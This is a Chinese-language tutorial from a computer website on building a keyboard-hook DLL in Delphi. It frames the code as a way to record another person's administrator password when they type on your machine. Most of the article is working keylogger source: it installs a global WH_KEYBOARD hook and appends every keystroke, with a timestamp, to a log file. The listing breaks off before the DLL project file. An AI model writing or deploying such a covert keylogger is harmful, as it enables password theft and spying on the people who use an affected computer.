Delphi编程使用HOOK监视Windows

时间:2010-02-05 17:12:25  来源:第二电脑网  作者:第二电脑网

  第二电脑网导读:候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。  下面就来举个例子(使用Delphi7.0调试通过):  如果你需要访问某个人的机器,那在运行SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录...
  正文:每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。

  下面就来举个例子(使用Delphi7.0调试通过):

  如果你需要访问某个人的机器,那在运行SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?

  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。

  写个DLL定义一下函数


function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;

procedure EntryPointProc(Reason: Integer);
 const
  hMapObject: THandle = 0;
 begin
    case reason of
     DLL_PROCESS_ATTACH:
    begin
       hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
       rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
      end;
    DLL_PROCESS_DETACH:
   begin
     try
        UnMapViewOfFile(rHookRec);
        CloseHandle(hMapObject);
        except
         end;
    end;
  end;
end;
procedure keyhookexit;far;
begin
  if hNexthookproc<>0 then endkeyhook;
   exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
  if hNexthookproc<>0 then
  begin
     unhookwindowshookex(hNexthookproc);
     hNexthookproc:=0;
     messagebeep(0);
  end;
  result:=hNexthookproc=0;
  MainHandle:=0;
end;

function Setkeyhook:bool;export;
begin
   hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
   result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
 s:Tstringlist;
begin
   if icode<0 then
   begin
      result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
      exit;
     end;
   if lparam<0 then
   begin
      exit;
     end;
   s:=TStringlist.Create;
   if FileExists(afilename) then
    s.LoadFromFile(afilename);
  
    //将敲打的键盘字符保存到文件中
  s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
    s.SaveToFile(afilename);
    s.Free;
  
    result:=0;
   end;


Dll的Project文件中定义如下


"Delphi编程使用HOOK监视Windows"由第二电脑网原创提供,转载请注明:http://www.002pc.com/master/College/Language/Delphi/12789.html


关键字:

关于《Delphi编程使用HOOK监视Windows》文章的评论

站内搜索: 高级搜索

热门搜索: Windows style 系统 tr IP QQ CPU 安装 function 注册 if td